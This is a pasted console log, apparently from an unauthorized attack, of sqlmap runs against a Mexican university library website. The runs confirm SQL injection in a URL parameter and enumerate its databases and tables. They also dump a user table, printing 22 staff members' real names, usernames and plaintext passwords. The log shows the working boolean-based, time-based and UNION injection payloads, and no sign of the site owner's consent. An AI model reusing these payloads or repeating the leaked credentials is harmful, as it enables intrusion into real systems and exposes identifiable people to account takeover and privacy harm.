SHARE
TWEET

hola mundo

a guest Jan 5th, 2017 1,474 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1.  
  2. C:\Users\whitejoker52\Desktop\hacking\sqlmap>sqlmap.py -u http://biblioteca.xoc.uam.mx/servicio.html?id_servicio=19 --dbms=mysql --dbs
  3.          _
  4.  ___ ___| |_____ ___ ___  {1.0.8.16#dev}
  5. |_ -| . | |     | .'| . |
  6. |___|_  |_|_|_|_|__,|  _|
  7.       |_|           |_|   http://sqlmap.org
  8.  
  9. [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
  10.  
  11. [*] starting at 17:06:24
  12.  
  13. [17:06:25] [INFO] testing connection to the target URL
  14. [17:06:28] [INFO] checking if the target is protected by some kind of WAF/IPS/IDS
  15. [17:06:29] [INFO] testing if the target URL is stable
  16. [17:06:30] [INFO] target URL is stable
  17. [17:06:30] [INFO] testing if GET parameter 'id_servicio' is dynamic
  18. [17:06:32] [INFO] confirming that GET parameter 'id_servicio' is dynamic
  19. [17:06:33] [INFO] GET parameter 'id_servicio' is dynamic
  20. [17:06:35] [INFO] heuristic (basic) test shows that GET parameter 'id_servicio' might be injectable (possible DBMS: 'MySQL')
  21. [17:06:36] [INFO] testing for SQL injection on GET parameter 'id_servicio'
  22. for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n]
  23. [17:08:01] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
  24. [17:08:10] [INFO] GET parameter 'id_servicio' appears to be 'AND boolean-based blind - WHERE or HAVING clause' injectable (with --string="Haz")
  25. [17:08:10] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'
  26. [17:08:12] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE, HAVING clause (BIGINT UNSIGNED)'
  27. [17:08:14] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)'
  28. [17:08:15] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE, HAVING clause (EXP)'
  29. [17:08:17] [INFO] testing 'MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)'
  30. [17:08:18] [INFO] testing 'MySQL >= 5.7.8 OR error-based - WHERE, HAVING clause (JSON_KEYS)'
  31. [17:08:20] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
  32. [17:08:22] [INFO] testing 'MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
  33. [17:08:24] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
  34. [17:08:25] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
  35. [17:08:27] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'
  36. [17:08:29] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'
  37. [17:08:30] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
  38. [17:08:32] [INFO] testing 'MySQL >= 4.1 OR error-based - WHERE, HAVING clause (FLOOR)'
  39. [17:08:33] [INFO] testing 'MySQL OR error-based - WHERE or HAVING clause (FLOOR)'
  40. [17:08:37] [INFO] testing 'MySQL >= 5.1 error-based - PROCEDURE ANALYSE (EXTRACTVALUE)'
  41. [17:08:38] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace (BIGINT UNSIGNED)'
  42. [17:08:40] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace (EXP)'
  43. [17:08:41] [INFO] testing 'MySQL >= 5.7.8 error-based - Parameter replace (JSON_KEYS)'
  44. [17:08:42] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace (FLOOR)'
  45. [17:08:44] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (UPDATEXML)'
  46. [17:08:45] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (EXTRACTVALUE)'
  47. [17:08:47] [INFO] testing 'MySQL inline queries'
  48. [17:08:48] [INFO] testing 'MySQL > 5.0.11 stacked queries (comment)'
  49. [17:08:49] [INFO] testing 'MySQL > 5.0.11 stacked queries'
  50. [17:08:51] [INFO] testing 'MySQL > 5.0.11 stacked queries (query SLEEP - comment)'
  51. [17:08:52] [INFO] testing 'MySQL > 5.0.11 stacked queries (query SLEEP)'
  52. [17:08:54] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query - comment)'
  53. [17:08:55] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'
  54. [17:08:58] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind'
  55. [17:09:10] [INFO] GET parameter 'id_servicio' appears to be 'MySQL >= 5.0.12 AND time-based blind' injectable
  56. [17:09:10] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
  57. [17:09:10] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
  58. [17:09:14] [INFO] 'ORDER BY' technique appears to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
  59. [17:09:23] [INFO] target URL appears to have 11 columns in query
  60. [17:09:49] [CRITICAL] unable to connect to the target URL ('Se ha forzado la interrupci¾n de una conexi¾n existente por el host remoto'). sqlmap is going to retry the request(s)
  61. [17:09:49] [WARNING] most probably web server instance hasn't recovered yet from previous timed based payload. If the problem persists please wait for few minutes and rerun without flag 'T' in option '--technique' (e.g. '--flush-session --technique=BEUS') or try to lower the value of option '--time-sec' (e.g. '--time-sec=2')
  62. [17:10:10] [INFO] GET parameter 'id_servicio' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable
  63. GET parameter 'id_servicio' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
  64. sqlmap identified the following injection point(s) with a total of 69 HTTP(s) requests:
  65. ---
  66. Parameter: id_servicio (GET)
  67.     Type: boolean-based blind
  68.     Title: AND boolean-based blind - WHERE or HAVING clause
  69.     Payload: id_servicio=19 AND 1397=1397
  70.  
  71.     Type: AND/OR time-based blind
  72.     Title: MySQL >= 5.0.12 AND time-based blind
  73.     Payload: id_servicio=19 AND SLEEP(5)
  74.  
  75.     Type: UNION query
  76.     Title: Generic UNION query (NULL) - 11 columns
  77.     Payload: id_servicio=-2865 UNION ALL SELECT NULL,NULL,CONCAT(0x7178627a71,0x6257576d614b736a796e6d73576c69476e56504161636268436f7170584a6e7674414b7363624254,0x7170716b71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- PYNR
  78. ---
  79. [17:13:23] [INFO] the back-end DBMS is MySQL
  80. web server operating system: Windows
  81. web application technology: PHP 5.2.3, Apache 2.2.4
  82. back-end DBMS: MySQL >= 5.0.12
  83. [17:13:23] [INFO] fetching database names
  84. [17:13:25] [INFO] the SQL query used returns 28 entries
  85. [17:13:27] [INFO] retrieved: information_schema
  86. [17:13:29] [INFO] retrieved: adq
  87. [17:13:30] [INFO] retrieved: aleph
  88. [17:13:32] [INFO] retrieved: areas_biblioteca
  89. [17:13:34] [INFO] retrieved: biblioteca_digital
  90. [17:13:35] [INFO] retrieved: cosei
  91. [17:13:37] [INFO] retrieved: cuentasxxi
  92. [17:13:39] [INFO] retrieved: descarteah
  93. [17:13:41] [INFO] retrieved: empleados
  94. [17:13:42] [INFO] retrieved: inegi
  95. [17:13:44] [INFO] retrieved: jornadas
  96. [17:13:45] [INFO] retrieved: libreria
  97. [17:13:47] [INFO] retrieved: libreria_antes_actualizacion
  98. [17:13:48] [INFO] retrieved: multimedia_registro
  99. [17:13:49] [INFO] retrieved: mysql
  100. [17:13:51] [INFO] retrieved: oai-uamx
  101. [17:13:52] [INFO] retrieved: phpmyadmin
  102. [17:13:54] [INFO] retrieved: pib
  103. [17:13:55] [INFO] retrieved: planes_bibliografia
  104. [17:13:57] [INFO] retrieved: proctec
  105. [17:13:58] [INFO] retrieved: recursos_electronicos
  106. [17:14:00] [INFO] retrieved: resguardos
  107. [17:14:01] [INFO] retrieved: revistas_electronicas
  108. [17:14:05] [INFO] retrieved: salas
  109. [17:14:06] [INFO] retrieved: sscbs
  110. [17:14:08] [INFO] retrieved: tesis
  111. [17:14:09] [INFO] retrieved: tesis_pruebas
  112. [17:14:11] [INFO] retrieved: test
  113. available databases [28]:
  114. [*] adq
  115. [*] aleph
  116. [*] areas_biblioteca
  117. [*] biblioteca_digital
  118. [*] cosei
  119. [*] cuentasxxi
  120. [*] descarteah
  121. [*] empleados
  122. [*] inegi
  123. [*] information_schema
  124. [*] jornadas
  125. [*] libreria
  126. [*] libreria_antes_actualizacion
  127. [*] multimedia_registro
  128. [*] mysql
  129. [*] oai-uamx
  130. [*] phpmyadmin
  131. [*] pib
  132. [*] planes_bibliografia
  133. [*] proctec
  134. [*] recursos_electronicos
  135. [*] resguardos
  136. [*] revistas_electronicas
  137. [*] salas
  138. [*] sscbs
  139. [*] tesis
  140. [*] tesis_pruebas
  141. [*] test
  142.  
  143. [17:14:11] [INFO] fetched data logged to text files under 'C:\Users\whitejoker52\.sqlmap\output\biblioteca.xoc.uam.mx'
  144.  
  145. [*] shutting down at 17:14:11
  146.  
  147.  
  148. C:\Users\whitejoker52\Desktop\hacking\sqlmap>sqlmap.py -u http://biblioteca.xoc.uam.mx/servicio.html?id_servicio=19 --dbms=mysql -D adq --tables
  149.          _
  150.  ___ ___| |_____ ___ ___  {1.0.8.16#dev}
  151. |_ -| . | |     | .'| . |
  152. |___|_  |_|_|_|_|__,|  _|
  153.       |_|           |_|   http://sqlmap.org
  154.  
  155. [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
  156.  
  157. [*] starting at 17:15:10
  158.  
  159. [17:15:10] [INFO] testing connection to the target URL
  160. sqlmap resumed the following injection point(s) from stored session:
  161. ---
  162. Parameter: id_servicio (GET)
  163.     Type: boolean-based blind
  164.     Title: AND boolean-based blind - WHERE or HAVING clause
  165.     Payload: id_servicio=19 AND 1397=1397
  166.  
  167.     Type: AND/OR time-based blind
  168.     Title: MySQL >= 5.0.12 AND time-based blind
  169.     Payload: id_servicio=19 AND SLEEP(5)
  170.  
  171.     Type: UNION query
  172.     Title: Generic UNION query (NULL) - 11 columns
  173.     Payload: id_servicio=-2865 UNION ALL SELECT NULL,NULL,CONCAT(0x7178627a71,0x6257576d614b736a796e6d73576c69476e56504161636268436f7170584a6e7674414b7363624254,0x7170716b71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- PYNR
  174. ---
  175. [17:15:12] [INFO] testing MySQL
  176. [17:15:14] [INFO] confirming MySQL
  177. [17:15:19] [INFO] the back-end DBMS is MySQL
  178. web server operating system: Windows
  179. web application technology: PHP 5.2.3, Apache 2.2.4
  180. back-end DBMS: MySQL >= 5.0.0
  181. [17:15:19] [INFO] fetching tables for database: 'adq'
  182. [17:15:22] [INFO] the SQL query used returns 48 entries
  183. [17:15:24] [INFO] retrieved: carreras
  184. [17:15:25] [INFO] retrieved: cotizaciones
  185. [17:15:27] [INFO] retrieved: cotizaciones_copy
  186. [17:15:28] [INFO] retrieved: donaciones
  187. [17:15:30] [INFO] retrieved: editoriales
  188. [17:15:31] [INFO] retrieved: email
  189. [17:15:32] [INFO] retrieved: estados_desicion
  190. [17:15:34] [INFO] retrieved: estados_email
  191. [17:15:36] [INFO] retrieved: estados_libro
  192. [17:15:37] [INFO] retrieved: estados_libro_pedido
  193. [17:15:39] [INFO] retrieved: estados_pedido
  194. [17:15:40] [INFO] retrieved: estados_proceso_libro
  195. [17:15:42] [INFO] retrieved: estados_solicitudes
  196. [17:15:43] [INFO] retrieved: evaluacion_proveedores
  197. [17:15:44] [INFO] retrieved: facturas
  198. [17:15:46] [INFO] retrieved: libros
  199. [17:15:48] [INFO] retrieved: libros_copy
  200. [17:15:49] [INFO] retrieved: libros_en_bodega
  201. [17:15:50] [INFO] retrieved: libros_presolicitudes
  202. [17:15:52] [INFO] retrieved: libros_solicitados_de_la_web
  203. [17:15:53] [INFO] retrieved: libros_solicitud
  204. [17:15:55] [INFO] retrieved: libros_solicitud_copy
  205. [17:15:56] [INFO] retrieved: libros_solicitudes
  206. [17:15:57] [INFO] retrieved: libros_solicitudes_copy
  207. [17:15:59] [INFO] retrieved: libros_solicitudes_pedidos
  208. [17:16:00] [INFO] retrieved: libros_solicitudes_pedidos_copy
  209. [17:16:02] [INFO] retrieved: listas_libros
  210. [17:16:04] [INFO] retrieved: listas_libros_copy
  211. [17:16:05] [INFO] retrieved: pedidos
  212. [17:16:07] [INFO] retrieved: pedidos_copy
  213. [17:16:08] [INFO] retrieved: pedidos_periodicos
  214. [17:16:10] [INFO] retrieved: periodicos
  215. [17:16:11] [INFO] retrieved: periodicos_pedido
  216. [17:16:13] [INFO] retrieved: pre_solicitudes
  217. [17:16:14] [INFO] retrieved: presupuestos
  218. [17:16:16] [INFO] retrieved: proveedores
  219. [17:16:17] [INFO] retrieved: proveedores_1
  220. [17:16:19] [INFO] retrieved: proveedores_revistas_periodicos
  221. [17:16:21] [INFO] retrieved: prueba
  222. [17:16:22] [INFO] retrieved: relacion_libros_web_libros_adq
  223. [17:16:24] [INFO] retrieved: relacion_solicitud_cotizacion_pedido
  224. [17:16:26] [INFO] retrieved: revistas
  225. [17:16:28] [INFO] retrieved: revistas_pedido
  226. [17:16:30] [INFO] retrieved: solicitudes
  227. [17:16:31] [INFO] retrieved: solicitudes_copy
  228. [17:16:33] [INFO] retrieved: solicitudes_de_la_web
  229. [17:16:34] [INFO] retrieved: tipos_de_material
  230. [17:16:36] [INFO] retrieved: usuarios
  231. Database: adq
  232. [48 tables]
  233. +--------------------------------------+
  234. | carreras                             |
  235. | cotizaciones                         |
  236. | cotizaciones_copy                    |
  237. | donaciones                           |
  238. | editoriales                          |
  239. | email                                |
  240. | estados_desicion                     |
  241. | estados_email                        |
  242. | estados_libro                        |
  243. | estados_libro_pedido                 |
  244. | estados_pedido                       |
  245. | estados_proceso_libro                |
  246. | estados_solicitudes                  |
  247. | evaluacion_proveedores               |
  248. | facturas                             |
  249. | libros                               |
  250. | libros_copy                          |
  251. | libros_en_bodega                     |
  252. | libros_presolicitudes                |
  253. | libros_solicitados_de_la_web         |
  254. | libros_solicitud                     |
  255. | libros_solicitud_copy                |
  256. | libros_solicitudes                   |
  257. | libros_solicitudes_copy              |
  258. | libros_solicitudes_pedidos           |
  259. | libros_solicitudes_pedidos_copy      |
  260. | listas_libros                        |
  261. | listas_libros_copy                   |
  262. | pedidos                              |
  263. | pedidos_copy                         |
  264. | pedidos_periodicos                   |
  265. | periodicos                           |
  266. | periodicos_pedido                    |
  267. | pre_solicitudes                      |
  268. | presupuestos                         |
  269. | proveedores                          |
  270. | proveedores_1                        |
  271. | proveedores_revistas_periodicos      |
  272. | prueba                               |
  273. | relacion_libros_web_libros_adq       |
  274. | relacion_solicitud_cotizacion_pedido |
  275. | revistas                             |
  276. | revistas_pedido                      |
  277. | solicitudes                          |
  278. | solicitudes_copy                     |
  279. | solicitudes_de_la_web                |
  280. | tipos_de_material                    |
  281. | usuarios                             |
  282. +--------------------------------------+
  283.  
  284. [17:16:36] [INFO] fetched data logged to text files under 'C:\Users\whitejoker52\.sqlmap\output\biblioteca.xoc.uam.mx'
  285.  
  286. [*] shutting down at 17:16:36
  287.  
  288.  
  289. C:\Users\whitejoker52\Desktop\hacking\sqlmap>sqlmap.py -u http://biblioteca.xoc.uam.mx/servicio.html?id_servicio=19 --dbms=mysql -D adq -T usuarios --columns
  290.          _
  291.  ___ ___| |_____ ___ ___  {1.0.8.16#dev}
  292. |_ -| . | |     | .'| . |
  293. |___|_  |_|_|_|_|__,|  _|
  294.       |_|           |_|   http://sqlmap.org
  295.  
  296. [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
  297.  
  298. [*] starting at 17:17:21
  299.  
  300. [17:17:22] [INFO] testing connection to the target URL
  301. sqlmap resumed the following injection point(s) from stored session:
  302. ---
  303. Parameter: id_servicio (GET)
  304.     Type: boolean-based blind
  305.     Title: AND boolean-based blind - WHERE or HAVING clause
  306.     Payload: id_servicio=19 AND 1397=1397
  307.  
  308.     Type: AND/OR time-based blind
  309.     Title: MySQL >= 5.0.12 AND time-based blind
  310.     Payload: id_servicio=19 AND SLEEP(5)
  311.  
  312.     Type: UNION query
  313.     Title: Generic UNION query (NULL) - 11 columns
  314.     Payload: id_servicio=-2865 UNION ALL SELECT NULL,NULL,CONCAT(0x7178627a71,0x6257576d614b736a796e6d73576c69476e56504161636268436f7170584a6e7674414b7363624254,0x7170716b71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- PYNR
  315. ---
  316. [17:17:24] [INFO] testing MySQL
  317. [17:17:24] [INFO] confirming MySQL
  318. [17:17:24] [INFO] the back-end DBMS is MySQL
  319. web server operating system: Windows
  320. web application technology: PHP 5.2.3, Apache 2.2.4
  321. back-end DBMS: MySQL >= 5.0.0
  322. [17:17:24] [INFO] fetching columns for table 'usuarios' in database 'adq'
  323. [17:17:26] [INFO] the SQL query used returns 5 entries
  324. [17:17:28] [INFO] retrieved: "id_usuario","smallint(4) unsigned"
  325. [17:17:29] [INFO] retrieved: "tipo","smallint(4)"
  326. [17:17:31] [INFO] retrieved: "usuario","varchar(50)"
  327. [17:17:33] [INFO] retrieved: "passwd","varchar(128)"
  328. [17:17:35] [INFO] retrieved: "nombre","varchar(100)"
  329. Database: adq
  330. Table: usuarios
  331. [5 columns]
  332. +------------+----------------------+
  333. | Column     | Type                 |
  334. +------------+----------------------+
  335. | id_usuario | smallint(4) unsigned |
  336. | nombre     | varchar(100)         |
  337. | passwd     | varchar(128)         |
  338. | tipo       | smallint(4)          |
  339. | usuario    | varchar(50)          |
  340. +------------+----------------------+
  341.  
  342. [17:17:35] [INFO] fetched data logged to text files under 'C:\Users\whitejoker52\.sqlmap\output\biblioteca.xoc.uam.mx'
  343.  
  344. [*] shutting down at 17:17:35
  345.  
  346.  
  347. C:\Users\whitejoker52\Desktop\hacking\sqlmap>sqlmap.py -u http://biblioteca.xoc.uam.mx/servicio.html?id_servicio=19 --dbms=mysql -D adq -T usuarios --columns --dump
  348.          _
  349.  ___ ___| |_____ ___ ___  {1.0.8.16#dev}
  350. |_ -| . | |     | .'| . |
  351. |___|_  |_|_|_|_|__,|  _|
  352.       |_|           |_|   http://sqlmap.org
  353.  
  354. [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
  355.  
  356. [*] starting at 17:18:43
  357.  
  358. [17:18:43] [INFO] testing connection to the target URL
  359. sqlmap resumed the following injection point(s) from stored session:
  360. ---
  361. Parameter: id_servicio (GET)
  362.     Type: boolean-based blind
  363.     Title: AND boolean-based blind - WHERE or HAVING clause
  364.     Payload: id_servicio=19 AND 1397=1397
  365.  
  366.     Type: AND/OR time-based blind
  367.     Title: MySQL >= 5.0.12 AND time-based blind
  368.     Payload: id_servicio=19 AND SLEEP(5)
  369.  
  370.     Type: UNION query
  371.     Title: Generic UNION query (NULL) - 11 columns
  372.     Payload: id_servicio=-2865 UNION ALL SELECT NULL,NULL,CONCAT(0x7178627a71,0x6257576d614b736a796e6d73576c69476e56504161636268436f7170584a6e7674414b7363624254,0x7170716b71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- PYNR
  373. ---
  374. [17:18:46] [INFO] testing MySQL
  375. [17:18:46] [INFO] confirming MySQL
  376. [17:18:46] [INFO] the back-end DBMS is MySQL
  377. web server operating system: Windows
  378. web application technology: PHP 5.2.3, Apache 2.2.4
  379. back-end DBMS: MySQL >= 5.0.0
  380. [17:18:46] [INFO] fetching columns for table 'usuarios' in database 'adq'
  381. [17:18:46] [INFO] the SQL query used returns 5 entries
  382. [17:18:46] [INFO] resumed: "id_usuario","smallint(4) unsigned"
  383. [17:18:46] [INFO] resumed: "tipo","smallint(4)"
  384. [17:18:46] [INFO] resumed: "usuario","varchar(50)"
  385. [17:18:46] [INFO] resumed: "passwd","varchar(128)"
  386. [17:18:46] [INFO] resumed: "nombre","varchar(100)"
  387. Database: adq
  388. Table: usuarios
  389. [5 columns]
  390. +------------+----------------------+
  391. | Column     | Type                 |
  392. +------------+----------------------+
  393. | id_usuario | smallint(4) unsigned |
  394. | nombre     | varchar(100)         |
  395. | passwd     | varchar(128)         |
  396. | tipo       | smallint(4)          |
  397. | usuario    | varchar(50)          |
  398. +------------+----------------------+
  399.  
  400. [17:18:46] [INFO] fetching columns for table 'usuarios' in database 'adq'
  401. [17:18:46] [INFO] the SQL query used returns 5 entries
  402. [17:18:46] [INFO] resumed: "id_usuario","smallint(4) unsigned"
  403. [17:18:46] [INFO] resumed: "tipo","smallint(4)"
  404. [17:18:46] [INFO] resumed: "usuario","varchar(50)"
  405. [17:18:46] [INFO] resumed: "passwd","varchar(128)"
  406. [17:18:46] [INFO] resumed: "nombre","varchar(100)"
  407. [17:18:46] [INFO] fetching entries for table 'usuarios' in database 'adq'
  408. [17:18:48] [INFO] the SQL query used returns 22 entries
  409. [17:18:49] [INFO] retrieved: "1","Administrador","ADMIN","1","ADMIN"
  410. [17:18:51] [INFO] retrieved: "2","Luis Maya Hernández","PROCESOS","1","LMAYAH"
  411. [17:18:52] [INFO] retrieved: "3","Adquisiciones","CONSULTA","1","CCAMACHO"
  412. [17:18:54] [INFO] retrieved: "4","Helia Terreros M.","COSEI","1","COSEI"
  413. [17:18:56] [INFO] retrieved: "5","Anabel","APOYO","3","ANABEL"
  414. [17:18:57] [INFO] retrieved: "6","Alejandra","PROCTEC","3","ALEJANDRA"
  415. [17:18:59] [INFO] retrieved: "7","Hortensia Galván M.","FACTURA","1","ADMINIS...
  416. [17:19:00] [INFO] retrieved: "8","I. Alfonsina Flores Ocampo","IGNALF131","2"...
  417. [17:19:02] [INFO] retrieved: "9","Leticia Peña Mata","LETIMA133","2","LETICIA"
  418. [17:19:04] [INFO] retrieved: "10","Ricardo Villafañez","RICVIL1","2","RICARDO"
  419. [17:19:05] [INFO] retrieved: "11","Rubén Velasco","RUVEL12","2","VELASCO"
  420. [17:19:07] [INFO] retrieved: "12","Prueba","prueba","3","prueba"
  421. [17:19:08] [INFO] retrieved: "13","Lorena Largo Pérez","BIBLIO12","1","LORENA"
  422. [17:19:10] [INFO] retrieved: "14","Julio Ibarra","INFODOC","1","JULIO"
  423. [17:19:11] [INFO] retrieved: "15","Oscar Solares","REVISION","2","SOLARES"
  424. [17:19:13] [INFO] retrieved: "16","Enrique Martínez Escalante","PROCESA","2",...
  425. [17:19:14] [INFO] retrieved: "17","Magdalena Monsalvo","MONSA74","3","MAGDALENA"
  426. [17:19:16] [INFO] retrieved: "18","Brenda Bonilla Cruz","ADQUI21","2","BRENDA"
  427. [17:19:17] [INFO] retrieved: "19","Mónica Paola Gorostieta Cornejo","GOROSCOR...
  428. [17:19:19] [INFO] retrieved: "20","Silvia Kirstenssen Wivrow Osorio ","WIVROW...
  429. [17:19:20] [INFO] retrieved: "21","Amelia Escandón Solís","AMELIA","2","ESCAN...
  430. [17:19:22] [INFO] retrieved: "22","Miguel Ángel Lara López","LARA","2","ANGEL"
  431. [17:19:22] [INFO] analyzing table dump for possible password hashes
  432. Database: adq
  433. Table: usuarios
  434. [22 entries]
  435. +------------+------+-----------+-----------------------------------+----------------+
  436. | id_usuario | tipo | passwd    | nombre                            | usuario        |
  437. +------------+------+-----------+-----------------------------------+----------------+
  438. | 1          | 1    | ADMIN     | Administrador                     | ADMIN          |
  439. | 2          | 1    | PROCESOS  | Luis Maya Hernández               | LMAYAH         |
  440. | 3          | 1    | CONSULTA  | Adquisiciones                     | CCAMACHO       |
  441. | 4          | 1    | COSEI     | Helia Terreros M.                 | COSEI          |
  442. | 5          | 3    | APOYO     | Anabel                            | ANABEL         |
  443. | 6          | 3    | PROCTEC   | Alejandra                         | ALEJANDRA      |
  444. | 7          | 1    | FACTURA   | Hortensia Galván M.               | ADMINISTRATIVA |
  445. | 8          | 2    | IGNALF131 | I. Alfonsina Flores Ocampo        | ALFONSINA      |
  446. | 9          | 2    | LETIMA133 | Leticia Peña Mata                 | LETICIA        |
  447. | 10         | 2    | RICVIL1   | Ricardo Villafañez                | RICARDO        |
  448. | 11         | 2    | RUVEL12   | Rubén Velasco                     | VELASCO        |
  449. | 12         | 3    | prueba    | Prueba                            | prueba         |
  450. | 13         | 1    | BIBLIO12  | Lorena Largo Pérez                | LORENA         |
  451. | 14         | 1    | INFODOC   | Julio Ibarra                      | JULIO          |
  452. | 15         | 2    | REVISION  | Oscar Solares                     | SOLARES        |
  453. | 16         | 2    | PROCESA   | Enrique Martínez Escalante        | ENRIQUE        |
  454. | 17         | 3    | MONSA74   | Magdalena Monsalvo                | MAGDALENA      |
  455. | 18         | 2    | ADQUI21   | Brenda Bonilla Cruz               | BRENDA         |
  456. | 19         | 1    | GOROSCOR  | Mónica Paola Gorostieta Cornejo   | MONICA         |
  457. | 20         | 1    | WIVROW    | Silvia Kirstenssen Wivrow Osorio  | SILVIA         |
  458. | 21         | 2    | AMELIA    | Amelia Escandón Solís             | ESCANDON       |
  459. | 22         | 2    | LARA      | Miguel Ángel Lara López           | ANGEL          |
  460. +------------+------+-----------+-----------------------------------+----------------+
  461.  
  462. [17:19:22] [INFO] table 'adq.usuarios' dumped to CSV file 'C:\Users\whitejoker52\.sqlmap\output\biblioteca.xoc.uam.mx\dump\adq\usuarios.csv'
  463. [17:19:22] [INFO] fetched data logged to text files under 'C:\Users\whitejoker52\.sqlmap\output\biblioteca.xoc.uam.mx'
  464.  
  465. [*] shutting down at 17:19:22
  466.  
  467.  
  468. C:\Users\whitejoker52\Desktop\hacking\sqlmap>sqlmap.py -u http://biblioteca.xoc.uam.mx/servicio.html?id_servicio=19 --dbms=mysql --dbs
  469.          _
  470.  ___ ___| |_____ ___ ___  {1.0.8.16#dev}
  471. |_ -| . | |     | .'| . |
  472. |___|_  |_|_|_|_|__,|  _|
  473.       |_|           |_|   http://sqlmap.org
  474.  
  475. [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
  476.  
  477. [*] starting at 17:22:26
  478.  
  479. [17:22:26] [INFO] testing connection to the target URL
  480. sqlmap resumed the following injection point(s) from stored session:
  481. ---
  482. Parameter: id_servicio (GET)
  483.     Type: boolean-based blind
  484.     Title: AND boolean-based blind - WHERE or HAVING clause
  485.     Payload: id_servicio=19 AND 1397=1397
  486.  
  487.     Type: AND/OR time-based blind
  488.     Title: MySQL >= 5.0.12 AND time-based blind
  489.     Payload: id_servicio=19 AND SLEEP(5)
  490.  
  491.     Type: UNION query
  492.     Title: Generic UNION query (NULL) - 11 columns
  493.     Payload: id_servicio=-2865 UNION ALL SELECT NULL,NULL,CONCAT(0x7178627a71,0x6257576d614b736a796e6d73576c69476e56504161636268436f7170584a6e7674414b7363624254,0x7170716b71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- PYNR
  494. ---
  495. [17:22:28] [INFO] testing MySQL
  496. [17:22:28] [INFO] confirming MySQL
  497. [17:22:28] [INFO] the back-end DBMS is MySQL
  498. web server operating system: Windows
  499. web application technology: PHP 5.2.3, Apache 2.2.4
  500. back-end DBMS: MySQL >= 5.0.0
  501. [17:22:28] [INFO] fetching database names
  502. [17:22:28] [INFO] the SQL query used returns 28 entries
  503. available databases [28]:
  504. [*] adq
  505. [*] aleph
  506. [*] areas_biblioteca
  507. [*] biblioteca_digital
  508. [*] cosei
  509. [*] cuentasxxi
  510. [*] descarteah
  511. [*] empleados
  512. [*] inegi
  513. [*] information_schema
  514. [*] jornadas
  515. [*] libreria
  516. [*] libreria_antes_actualizacion
  517. [*] multimedia_registro
  518. [*] mysql
  519. [*] oai-uamx
  520. [*] phpmyadmin
  521. [*] pib
  522. [*] planes_bibliografia
  523. [*] proctec
  524. [*] recursos_electronicos
  525. [*] resguardos
  526. [*] revistas_electronicas
  527. [*] salas
  528. [*] sscbs
  529. [*] tesis
  530. [*] tesis_pruebas
  531. [*] test
  532.  
  533. [17:22:29] [INFO] fetched data logged to text files under 'C:\Users\whitejoker52\.sqlmap\output\biblioteca.xoc.uam.mx'
  534.  
  535. [*] shutting down at 17:22:29
  536.  
  537.  
  538. C:\Users\whitejoker52\Desktop\hacking\sqlmap>sqlmap.py -u http://biblioteca.xoc.uam.mx/servicio.html?id_servicio=19 --dbms=mysql -D biblioteca_digital --tables
  539.          _
  540.  ___ ___| |_____ ___ ___  {1.0.8.16#dev}
  541. |_ -| . | |     | .'| . |
  542. |___|_  |_|_|_|_|__,|  _|
  543.       |_|           |_|   http://sqlmap.org
  544.  
  545. [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
  546.  
  547. [*] starting at 17:22:47
  548.  
